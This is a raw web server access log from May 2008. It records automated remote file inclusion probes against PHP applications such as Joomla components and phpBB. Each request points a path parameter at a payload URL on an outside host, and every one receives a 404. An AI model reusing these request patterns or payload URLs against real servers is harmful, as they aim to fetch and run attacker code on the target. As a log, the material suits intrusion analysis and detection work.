74.53.197.2 - - [14/May/2008:22:35:51 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.197.2 - - [14/May/2008:22:35:51 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:35:59 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:35:59 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:36:01 -0700] "GET /logs/access_080429.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:36:01 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:36:01 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
72.55.148.27 - - [14/May/2008:22:36:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:36:22 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:36:22 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:36:23 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:36:25 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
77.48.10.14 - - [14/May/2008:22:36:41 -0700] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
77.48.10.14 - - [14/May/2008:22:36:41 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
77.48.10.14 - - [14/May/2008:22:36:42 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
124.0.110.130 - - [14/May/2008:22:36:49 -0700] "GET /logs/access_080501.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
124.0.110.130 - - [14/May/2008:22:36:49 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
124.0.110.130 - - [14/May/2008:22:36:50 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
70.84.182.98 - - [14/May/2008:22:36:54 -0700] "GET /logs//atom.php5?page=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:37:03 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:37:03 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:37:04 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:37:10 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:37:11 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:37:11 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:37:12 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
222.124.213.71 - - [14/May/2008:22:37:52 -0700] "GET /logs//atom.php5?page=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
222.124.213.71 - - [14/May/2008:22:37:53 -0700] "GET //atom.php5?page=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:37:57 -0700] "GET /logs/access_080501.log//atom.php5?page=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:37:57 -0700] "GET /logs//atom.php5?page=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:38:02 -0700] "GET /logs/access.log//atom.php5?page=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:38:31 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:38:31 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:39:10 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:39:11 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:39:15 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:39:16 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:39:16 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:39:16 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:39:16 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
201.6.124.15 - - [14/May/2008:22:39:44 -0700] "GET /logs/access.log/component/option,com_forum/components/com_forum/forum.frame.php?ff_compath=http://www.ulbracarazinho.edu.br/pos/cmds.txt??F? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
201.6.124.15 - - [14/May/2008:22:39:45 -0700] "GET /component/option,com_forum/components/com_forum/forum.frame.php?ff_compath=http://www.ulbracarazinho.edu.br/pos/cmds.txt??F? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
201.6.124.15 - - [14/May/2008:22:39:46 -0700] "GET /logs/component/option,com_forum/components/com_forum/forum.frame.php?ff_compath=http://www.ulbracarazinho.edu.br/pos/cmds.txt??F? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:39:47 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:39:48 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:39:48 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.55.6.34 - - [14/May/2008:22:39:49 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.gooteo.com/adpics/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "jainvestigation.com"
74.55.6.34 - - [14/May/2008:22:39:49 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.gooteo.com/adpics/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "jainvestigation.com"
160.99.12.231 - - [14/May/2008:22:40:00 -0700] "GET /logs/config.inc.php?path_escape=http://216.120.252.101/~beogor/news/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "jainvestigation.com"
160.99.12.231 - - [14/May/2008:22:40:01 -0700] "GET /config.inc.php?path_escape=http://216.120.252.101/~beogor/news/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "jainvestigation.com"
211.47.128.156 - - [14/May/2008:22:40:11 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
211.47.128.156 - - [14/May/2008:22:40:11 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
211.47.128.156 - - [14/May/2008:22:40:11 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
58.26.137.64 - - [14/May/2008:22:40:15 -0700] "GET /logs/access_080502.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://216.120.252.101/~beogor/news/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:40:22 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:40:22 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:40:23 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:40:23 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:40:35 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://www.geocities.com/cmd182182/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:40:35 -0700] "GET /logs//include.php?path[docroot]=http://www.geocities.com/cmd182182/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:40:39 -0700] "GET /logs/access_080430.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:40:39 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:40:39 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:40:40 -0700] "GET /logs/access_080430.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:40:41 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:40:41 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:40:51 -0700] "GET /logs/access_080430.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:40:51 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:40:51 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
160.99.12.231 - - [14/May/2008:22:41:01 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.120.252.101/~beogor/news/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "jainvestigation.com"
160.99.12.231 - - [14/May/2008:22:41:02 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.120.252.101/~beogor/news/cmd?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:41:27 -0700] "GET /logs/access_080502.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:41:27 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:41:27 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:42:13 -0700] "GET /logs/access_080429.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:42:13 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:42:13 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:42:21 -0700] "GET /logs/access_080430.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:42:21 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:42:23 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.geocities.com/cmd182182/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:42:25 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:42:40 -0700] "GET /logs/access_080430.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:42:40 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:42:40 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:42:50 -0700] "GET /logs/access_080430.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:42:50 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:42:50 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:42:54 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:43:07 -0700] "GET /logs/access_080430.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:43:07 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:43:08 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:14 -0700] "GET /logs/access_080501.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:14 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:15 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:43:17 -0700] "GET /logs/access_080501.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:43:17 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:43:17 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:43:35 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:43:40 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:40 -0700] "GET /logs/access_080430.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:43:40 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:43:41 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:41 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:41 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:42 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:42 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:43:43 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:43:44 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:43:44 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:43:44 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:43:50 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:43:51 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:43:54 -0700] "GET /logs/access_080430.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:43:54 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:43:55 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:44:05 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
